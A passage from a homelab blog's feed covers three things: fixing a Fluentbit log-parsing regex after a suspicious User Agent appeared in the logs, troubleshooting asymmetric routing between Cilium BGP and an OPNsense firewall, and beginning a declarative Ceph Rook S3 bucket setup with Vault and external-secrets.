this nagging thought: Why was I only seeing the malicious User Agent content in
my aggregated logs?</p>
<p>Here the slight worry started returning: My Traefik logs are pushed through a
JSON parser in my FluentD config. Could that parser have executed the lines
somehow&hellip;?
But luckily, no. I was just lazy in the Fluentbit setup which collects the logs
from the Traefik log file on my bastion host and sends them to FluentD. The
config looks like this:</p>
<pre tabindex="0"><code>[PARSER]
    Name podman-traefik
    Format regex
    Regex ^.* (?&lt;log&gt;\{.*\})$
</code></pre><p>And with this regex, the above log line extracts exactly the malicious bash
code as the <code>log</code> content for sending to FluentD. That&rsquo;s why I was only seeing
the bash code in my aggregated code, instead of the full Traefik access log.</p>
<p>I fixed the issue by changing the regex to this:</p>
<pre tabindex="0"><code>Regex ^[^\ ]* [^\ ]* [A-Z] (?&lt;log&gt;\{.*\})$
</code></pre><p>With that change, the Traefik Podman logs are parsed properly, with the Podman
prefix removed and the remaining JSON from Traefik itself being send on to
FluentD.</p>
<p>One important thing that this made me realize: I only found this suspicious log
line because I happened to look at the logs at just the right time, so that it
was the most recent line for the FluentD logs. If I had looked sometime later
today, perhaps after another FluentD restart, I would have never seen it. Looks
like I will need to finally tackle that &ldquo;Have a look at Alertmanager&rdquo; task which
has been sitting in the middle of my task list for a long time now.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 2b: Asymmetric Routing</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-2b-asymmetric-routing/</link>
      <pubDate>Sun, 04 Feb 2024 23:00:00 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-2b-asymmetric-routing/</guid>
      <description>Problems with Cilium BGP and the OPNsense firewall</description>
      <content:encoded><![CDATA[<p>Wherein I ran into some problems with the Cilium BGP routing and firewalls on
my OPNsense box.</p>
<p>This is the second addendum for Cilium load balancing in my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>While working on my <a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/">S3 bucket migration</a>,
I ran into several rather weird problems. After switching my internal wiki over to
using the Ceph RGW S3 from my k8s Ceph Rook cluster, I found that the final
upload of the generated site to the S3 bucket from which it was served did not work, even though I had all the necessary
firewall rules configured. The output I was getting looked like this:</p>
<pre tabindex="0"><code>WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 3 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 6 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 9 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 12 sec...
WARNING: Retrying failed request: / ([Errno 110] Operation timed out)
WARNING: Waiting 15 sec...
ERROR: S3 Temporary Error: Request failed for: /.  Please try again later.
</code></pre><p>I initially thought that something was wrong with the Rook setup here, but this
didn&rsquo;t seem to be the case - uploading something to a test bucket from my C&amp;C
host worked fine. Same for uploads from my workstation.
Before going on, let me show you a small networking diagram:
<figure>
    <img loading="lazy" src="packet-flow.svg"
         alt="A network diagram. It shows three host. The first one has the name &#39;k8s host 1&#39;. This host has an internal interface labeled with &#39;Ceph S3 address: 10.86.55.100&#39;, with an external interface &#39;Host IP: 10.86.5.xx&#39;. The second host is labeled &#39;Nomad Host: Runs CI&#39;, with a single interface labeled &#39;Host IP: 10.86.5.xx&#39;, same as the previous host. Finally, there is the &#39;OPNsense Firewall&#39; host. It shows a single interface labeled &#39;Homelab VLAN interface&#39;. There are arrows going from the &#39;CI host&#39; to the firewall, on to the k8s host&#39;s host interface and finally into the S3 interface. In the other direction goes a pair of red arrows, out of the S3 interface, into the hosts external interface and from there directly into the Nomad host&#39;s external interface - without a detour via the router."/> <figcaption>
            <p>Perfect example of asymmetric routing.</p>
        </figcaption>
</figure>
</p>
<p>This is a picture-perfect example of asymmetric routing. The S3 service is
announced via a LoadBalancer service and Cilium&rsquo;s BGP functionality. All my
LoadBalancer services are in a separate subnet from the hosts themselves.
So to reach the S3 service, all packets need to go through the OPNsense box.</p>
<p>This is obviously not ideal, as now the uplink to the router&rsquo;s interface becomes
a bottleneck. This could in theory be fixed by using L2 announcements instead,
but those put a pretty high load on the k8s control plane nodes, through using
k8s leases. And the load scales with the amount of hosts in the k8s cluster.</p>
<p>But in this particular case, the problem is asymmetric routing. The Nomad host
running the CI jobs trying to access the S3 buckets will use the LoadBalancer
IP, accessing the Ceph RGW through my Traefik ingress. This IP is in a different
subnet than the hosts, and hence the packets go through the default gateway,
which is my OPNsense box. There, they are routed to the next hop, which is the
k8s node currently running my ingress. From there, they&rsquo;re finally routed
internally to the Ceph RGW pod.</p>
<p>But on the return path for the response packets, they go directly from the
host running the RGW pod to the host running the CI job. This is due to the fact
that both hosts are in the same subnet.</p>
<p>The first consequence of this is the need to change the firewall rules for
accessing the Traefik ingress LoadBalancer service IP from the Homelab.
Initially, my rule used the default state tracking setting. But in this case,
that does not work. The firewall will see the initial TCP SYN packet coming
from the CI job host, but it won&rsquo;t see the SYN and ACK from the ingress,
because those are send directly from host to host, not via the router.
Seeing only one side of the connection, the firewall still blocks subsequent
packets.</p>
<p>The solution to this is to change the way OPNsense tracks connections for
the specific rule allowing access to the ingress from the Homelab VLAN. This can
be done in the rule&rsquo;s options, under &ldquo;Advanced features&rdquo;:
<figure>
    <img loading="lazy" src="sloppy.png"
         alt="A screenshot of part of the OPNsense firewall rule configuration. A dropdown besides the label &#39;State Type&#39; is visible, with the entry &#39;sloppy state&#39; selected."/> <figcaption>
            <p>The state type for rules which concern asymmetric routing needs to be set to &lsquo;sloppy state&rsquo;</p>
        </figcaption>
</figure>
</p>
<p>That was this problem fixed, and the upload started working - but incredibly
slowly. I got long phases with no transmission at all and some retries. It
looked like this:</p>
<pre tabindex="0"><code>upload: &#39;./public/404.html&#39; -&gt; &#39;s3://wiki/404.html&#39;  [1 of 97]


 9287 of 9287   100% in    0s     3.35 MB/s
 9287 of 9287   100% in    0s    33.80 KB/s  done

upload: &#39;./public/categories/index.html&#39; -&gt; &#39;s3://wiki/categories/index.html&#39;  [2 of 97]


 34120 of 34120   100% in    0s     6.75 MB/s
 34120 of 34120   100% in    0s   304.53 KB/s  done

upload: &#39;./public/ceph/index.html&#39; -&gt; &#39;s3://wiki/ceph/index.html&#39;  [3 of 97]


 34195 of 34195   100% in    0s     5.34 MB/s
 34195 of 34195   100% in    0s     5.34 MB/s  failed

WARNING: Upload failed: /ceph/index.html (The read operation timed out)

WARNING: Waiting 3 sec...

upload: &#39;./public/ceph/index.html&#39; -&gt; &#39;s3://wiki/ceph/index.html&#39;  [3 of 97]


 34195 of 34195   100% in    0s   769.35 KB/s
 34195 of 34195   100% in    0s   101.93 KB/s  done

upload: &#39;./public/ceph/index.xml&#39; -&gt; &#39;s3://wiki/ceph/index.xml&#39;  [4 of 97]
</code></pre><p>The pattern here seemed to be: Initially, the uploads work for a very short while,
and then they stop working. And at some later point, the transmission works
again.</p>
<h2 id="setting-up-an-iperf3-pod">Setting up an iperf3 Pod</h2>
<p>I wasn&rsquo;t able to make anything of the log output, so I build myself a test setup with
an iperf3 pod in the k8s cluster, made available via a LoadBalancer service
similar to how my ingress is made available.</p>
<p>As the basis, I&rsquo;m using the <a href="https://github.com/wbitt/Network-MultiTool">network-multitool</a>
container, in the <code>:extra</code> variant. I&rsquo;m launching the Pod via this Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">wbitt/network-multitool:extra</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;iperf3&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-p&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;55343&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-s&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">iperf-port</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">55343</span>
</span></span></code></pre></div><p>By default, the container runs a simple webserver. I&rsquo;m changing that here to
running an iperf3 instance in server mode.
In addition, I&rsquo;ve created the following Service to make the iperf3 server
externally available:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">iperf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">iperf-k8s.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#ae81ff">10.86.55.12</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">network-multitool</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">iperf-port</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">55343</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">55343</span>
</span></span></code></pre></div><p>Once that service is created, Cilium will announce a route to the IP <code>10.86.55.12</code>
with the k8s node currently running the iperf3 Pod as the next hop. This
route will be used by my OPNsense box. As the <code>10.86.55.0/24</code> subnet is not the
same as my Homelab VLAN&rsquo;s subnet, all traffic to the iperf3 instance will go
through the OPNsense box.</p>
<p>I started with a simple test, running from a different host inside the Homelab
VLAN.
<figure>
    <img loading="lazy" src="iperf3-homelab-net.png"
         alt="A screenshot of an iperf3 session. The session ran for a total of 60 seconds. During the first 5 seconds, there was a bit of traffic, with a bitrate of 519 kbit/s and a total of 317 kB transferred. Then, for the time from 5s to 50s, absolutely no traffic happened. Both transfers and bitrates are zero. At 50 - 55 seconds, a transfer of 91 MB at a bitrate of 153 Mbit/s is registered. In the final interval, 55 seconds to 60 seconds, 538 MB are transferred with a bitrate of 903 Mbit/s. The final tally over the whole 60 seconds is a bitrate of 88 Mbit/s and a total amount transferred of 639 MB."/> <figcaption>
            <p>Transfer from a Homelab host as the iperf3 client.</p>
        </figcaption>
</figure>
</p>
<p>This test showed a somewhat similar behavior. Initially, the transmission works,
but then it just stops. For about 45 seconds, in this case. And then, rather
suddenly, the transmission starts up again. At least I had the ability to
repeat the problem at will now.
I conducted a separate test, this one from my workstation, which is in a separate
VLAN:
<figure>
    <img loading="lazy" src="iperf3-desktop.png"
         alt="A screenshot of an iperf3 session. The session ran for a total of 60 seconds. This one shows relatively consistent bitrates of about 920 Mbit/s and around 540 MB transferred per 5 second internal. In total, 6.36 GB were transferred, at an average rate of 911 Mbit/s."/> <figcaption>
            <p>Same iperf3 server in a k8s Pod, but with my workstation, from my management VLAN, showing the expected (almost) line speed.</p>
        </figcaption>
</figure>
</p>
<p>So, from the management VLAN, I get full line speed, and no weird gaps in the
transmission. There are two differences here: First, the Homelab VLAN transmission
happened over the same VLAN, with the node hosting the iperf3 pod being in the
same subnet as the client. The second difference, and as it turns out, the more
relevant one, is that the management VLAN has very few firewall rules, while
the Homelab is nailed pretty much shut.</p>
<p>So I went investigating some more. As seems to be the case way too often in this
Kubernetes migration, it was Wireshark o&rsquo;clock again.</p>
<p>The initial packet capture, from both the iperf3 pod and the client on another
host, showed exactly what I was expecting, there was just a big, about 45 seconds
long hole in the traffic I couldn&rsquo;t explain, before the traffic started up again.</p>
<p>I also gathered some data on my router, specifically on the interface
which leads to my Homelab. And it showed something interesting.</p>
<p>First, here is the initial, successful transmission:</p>
<pre tabindex="0"><code>113	0.058354	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=62966 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863917
</code></pre><p>Then, and this is the important point, comes a second transmission, seemingly
of the same packet, which is marked by Wireshark as a TCP re-transmission:</p>
<pre tabindex="0"><code>114	0.058357	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=62966 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863917
</code></pre><p>What this actually is becomes obvious when looking at the L2 source MAC address.
The first packet is arriving from the MAC that belongs to the Pi I was running
the iperf3 client on, with the target MAC being the interface for Homelab VLAN
traffic on my OPNsense box.
The second packet, though, was send out with the MAC of the OPNsense box, with
the MAC of the next hop host of the LoadBalancer IP as a target.</p>
<p>And now comes the interesting part. After some successful transmissions, the
following happens:</p>
<pre tabindex="0"><code>158	0.059077	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=121790 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863918
[...]
165	0.059217	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=131366 Ack=1 Win=64256 Len=1368 TSval=115511759 TSecr=1303863918
[...]
175	54.149140	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=65702 Ack=1 Win=64256 Len=1368 TSval=115565850 TSecr=1303863918
</code></pre><p>All of these packets, right up to the last one at sequence number 175, are coming
from the Raspberry Pi serving as a client. At the same time, I&rsquo;m not seeing any
packets at all coming out of the OPNsense box, like the second packet from the
previous sequence. This looks like the firewall just blackholes the packets,
or as if routing temporarily fails.
And then it starts working again, without me actually doing anything:</p>
<pre tabindex="0"><code>176	54.149156	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=65702 Ack=1 Win=64256 Len=1368 TSval=115565850 TSecr=1303863918
177	54.150365	10.86.5.125	10.86.55.12	TCP	1434	55643 → 55343 [ACK] Seq=135470 Ack=1 Win=64256 Len=1368 TSval=115565851 TSecr=1303918009
178	54.150400	10.86.5.125	10.86.55.12	TCP	1434	[TCP Retransmission] 55643 → 55343 [ACK] Seq=135470 Ack=1 Win=64256 Len=1368 TSval=115565851 TSecr=1303918009
</code></pre><p>Here the behavior is the same as in the beginning: The packet arrives with the Pi
as the source MAC and then leaves again with the firewall&rsquo;s MAC as the source.</p>
<p>And I&rsquo;m still not sure what this is all about - the suspicious, about 45 second
interval where no packets are routed.
So I will call my solution a workaround, and not a fix - because I might have
just fought a symptom, instead of the root problem.</p>
<p>The fix was to create another firewall rule, allowing access from the Homelab
VLAN to the IP of the iperf LoadBalancer. This must sound weird. But in my initial configuration,
I only allowed the Homelab access to specific other machines on specific ports,
and I normally only have inbound rules for most stuff besides the IoT VLAN.</p>
<p>What I did in OPNsense was to create an OUT rule, allowing access from the
Homelab VLAN to the IP of the iperf LoadBalancer service. And all of a sudden,
it all started working.</p>
<p>What&rsquo;s annoying me is that I have no explanation at all for this kind of behavior.
I mean sure, I think I understand why the firewall would block the packet when
it tries to leave the OPNsense box in the direction of my Homelab. But - why
does the iperf transmission start to work, all of a sudden? And why does it
work at the very beginning of the transmission? That&rsquo;s what I don&rsquo;t get. If the
missing firewall rule was the root cause, shouldn&rsquo;t it not work at all - instead
of just not work for 45 seconds in the middle of a connection?</p>
<p>And I&rsquo;ve also tried longer transmissions, e.g. 2 minutes instead of one. And
here I saw the same pattern. First the couple of successful packets, then a
45 second hole, and then it worked for the entire remaining 1 minute of the
test.</p>
<p>If any of my readers has any idea what&rsquo;s going on here, why I need the
firewall rule, and why only some part of the iperf transmission was blocked,
I would be very happy to hear about it on <a href="https://social.mei-home.net/@mmeier">Mastodon</a>.</p>
<h2 id="conclusion">Conclusion</h2>
<p>To summarize, when setting up Cilium BGP within a pretty restricted OPNsense
firewall environment, check whether you&rsquo;ve got asymmetric routing going on.
If so, set the state tracking for the rule allowing access to the LoadBalancer
IP to <code>sloppy state</code>. In addition, add an outgoing rule on the VLAN of the
next hop advertised in the route to the LoadBalancer IP to make sure packets
don&rsquo;t get randomly dropped.</p>
<p>Finally, I&rsquo;m sadly still not sure what exactly is going on here.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 5: Non-service S3 Buckets</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/</link>
      <pubDate>Thu, 25 Jan 2024 20:50:41 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/</guid>
      <description>Migrating non-service S3 buckets over to the Ceph Rook cluster</description>
      <content:encoded><![CDATA[<p>Wherein I document how I migrated some S3 buckets over to the Ceph Rook cluster
and with that, made it load-bearing.</p>
<p>This is part six of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>So why write a post about migrating S3 buckets, and why do it at this point of
the Nomad -&gt; k8s migration? In short, it just fit in here very well. I already
planned to make Ceph Rook one of the first services to set up anyway. And then
the logical next step is to have a look at what I can then migrate over without
any other dependencies. And the answer to that was: Some <em>non-service</em> S3 buckets.
With &ldquo;non-service&rdquo; I mean those buckets which are not directly tied to specific
services running on the cluster, like Mastodon&rsquo;s media files bucket or Loki&rsquo;s
log storage bucket. Those I will migrate over with their respective services.</p>
<p>Instead, the buckets I&rsquo;m migrating over are things like my blog and wiki buckets.
Those run on Hugo and have been served directly by my Traefik proxy from S3
buckets. So with the <a href="https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/">previous Traefik ingress setup</a>
and Ceph Rook being set up, I had all the dependencies in place.</p>
<p>The final reason to do it right now is that I wanted to make the cluster
<em>load-bearing</em> ASAP. A little bit of that was to prevent myself from getting
into <em>too much</em> experimentation. Let&rsquo;s see whether that is going to pan out. &#x1f605;</p>
<h1 id="previous-setup-and-advantages-of-the-new-one">Previous setup and advantages of the new one</h1>
<p>Before getting into the S3 bucket setup with Ceph Rook and Ansible, let me
talk briefly about how the current setup on my baremetal Ceph cluster worked.</p>
<p>In one word: <em>Manually</em></p>
<p>So what&rsquo;s needed to create an S3 bucket and a new user and to configure that
bucket, manually?</p>
<p>Let&rsquo;s start with the user creation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>radosgw-admin user create --uid<span style="color:#f92672">=</span>USERNAME --display-name <span style="color:#e6db74">&#34;Description here&#34;</span>
</span></span></code></pre></div><p>This will output the new user&rsquo;s access ID and secret key. To make the credentials
usable by Nomad jobs, they also need to be written into Vault:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span> vault kv put secret/some/path id<span style="color:#f92672">=</span>ID key<span style="color:#f92672">=</span>-
</span></span></code></pre></div><p>This would plop up a prompt to enter the secret key. As my internal docs say:</p>
<blockquote>
<p>NOTE THE SPACE AT THE BEGINNING OF THE LINE!
That&rsquo;s to prevent even the access ID from finding its way into your history.</p></blockquote>
<p>I&rsquo;d then use <a href="https://min.io/docs/minio/linux/reference/minio-mc.html">MinIO&rsquo;s S3 client</a>
to create the bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mc alias set s3-SERVICENAME https://s3.example.com
</span></span><span style="display:flex;"><span>./mc mb s3-alias/BUCKETNAME
</span></span></code></pre></div><p>I&rsquo;m using the MinIO client mostly because I like the interface, although I don&rsquo;t
use MinIO itself.</p>
<p>That creates a bucket which can only be accessed with the previously created
credentials.
To provide a full bucket policy, I&rsquo;ve got to switch to a different command,
namely <a href="https://s3tools.org/s3cmd">s3cmd</a>, as MinIO does not support bucket
policies.</p>
<p>So I&rsquo;m then putting the credentials in a second place, for use with <code>s3cmd</code>,
and then create a JSON file for the policy to finally upload it with a command
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3cmd -c .s3cmd.conf setpolicy policy.json s3://BUCKETNAME
</span></span></code></pre></div><p>All of the previous commands need to be entered in the right order and the right
format, and for the right bucket with the right credentials. Lots of places for
user error.</p>
<p>And that&rsquo;s the main thing I&rsquo;m gaining from the new approach with Ceph Rook and
Ansible: Declarative creation of users, buckets and policies. This has the added
bonus of finally being able to version-control the S3 bucket setup.</p>
<h1 id="creating-users-buckets-and-policies-declaratively">Creating users, buckets and policies declaratively</h1>
<p>There are broadly three pieces to creating a bucket with my new approach:</p>
<ol>
<li>Create the S3 user in Ceph</li>
<li>Write the credentials into Vault</li>
<li>Use those credentials in Ansible to create the bucket and set policies</li>
</ol>
<p>Before I continue, there&rsquo;s one important note: Rook has an <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">Object Bucket Claim</a>.
This CRD can be used to create buckets together with S3 credentials for that
bucket in the form of a Secret. I will use this CRD later on, when I&rsquo;m migrating
actual services, to create their individual S3 buckets. And this is exactly
what those bucket claims are intended for. But for the buckets I&rsquo;m migrating here,
I need access to them outside Kubernetes, and I need to do things like
setting bucket policies to allow access for multiple users. The object bucket
claim can do neither of those things.
So using OBCs would defeat the purpose of creating everything declaratively.</p>
<p>Also worth mentioning is <a href="https://container-object-storage-interface.github.io/">COSI</a>,
the <em>Container Object Storage Interface</em>. This is similar to the CSI, a
provider-agnostic way to provide object storage buckets. But it&rsquo;s currently still
experimental, both in Kubernetes and in Rook.</p>
<p>With that out of the way, let&rsquo;s create an S3 user in Rook. This is done with
the <a href="https://rook.io/docs/rook/latest-release/CRDs/Object-Storage/ceph-object-store-user-crd/">CephObjectStoreUser</a> CRD. It might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;A user for demo purposes&#34;</span>
</span></span></code></pre></div><p>When applying this manifest, Rook will create a user named <code>my-user</code> and
automatically create a Secret with the user&rsquo;s credentials. This secret will
be stored in the given namespace, <code>rook-cluster</code> in this case. Note that by
default, Rook only allows creation of <code>CephObjectStoreUser</code> objects in the
namespace of the Rook operator itself. This can be overwritten during creation
of the <code>CephObjectStore</code> in the cluster Helm chart, but it seems to be a prudent
measure to only allow those who can write into the cluster namespace to
actually create users.</p>
<p>The name of the secret for the example above will be <code>rook-ceph-object-user-rgw-bulk-my-user</code>.
The first part is the Rook operator namespace name (note that this is <em>not</em> the
cluster namespace necessarily, but the <em>operator&rsquo;s</em> NS). Then follows the string
<code>ceph-object-user</code> followed by the name of the <code>CephObjectStore</code> the user is
going to be created in. The last part is the username itself.</p>
<p>The secret will have the following <code>data:</code> section:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">AccessKey</span>: <span style="color:#ae81ff">ABCDE</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">Endpoint</span>: <span style="color:#ae81ff">s3.example.com:4711</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">SecretKey</span>: <span style="color:#ae81ff">FGHIJ</span>
</span></span></code></pre></div><p>So it will contain all the info necessary. Also always remember that data is
encoded in base64. So when extracting the credentials for use in other apps,
always push the strings through <code>base64 --decode</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n rook-cluster secrets rook-ceph-object-user-rgw-bulk-my-user --template<span style="color:#f92672">={{</span>.data.AccessKey<span style="color:#f92672">}}</span> | base64 -d
</span></span><span style="display:flex;"><span>kubectl get -n rook-cluster secrets rook-ceph-object-user-rgw-bulk-my-user --template<span style="color:#f92672">={{</span>.data.SecretKey<span style="color:#f92672">}}</span> | base64 -d
</span></span></code></pre></div><p>But of course, a declarative setup isn&rsquo;t worth very much when you have to now
manually push the credentials to Vault as in my old workflow. Instead, I will
be using external-secret&rsquo;s <a href="https://external-secrets.io/latest/api/pushsecret/">PushSecret</a>.
PushSecret&rsquo;s allow me to push Secrets from Kubernetes to a provider, in a reversal
of the ExternalSecret. In this instance, I&rsquo;m using them to push the S3 credentials
created by Rook to my Vault instance, for use in Ansible for the bucket creation.</p>
<p>The first step needed is to update the Vault policy used by the Vault AppRole
used by external-secrets to allow it to not only read, but also write secrets:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;secret/my_kubernetes_secrets/cluster/s3/users/*&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;read&#34;, &#34;create&#34;, &#34;update&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This allows the AppRole to push secrets, but only to a specific path.</p>
<p>The PushSecret itself then looks like this, again using the credentials of the
previously created user as an example:</p>
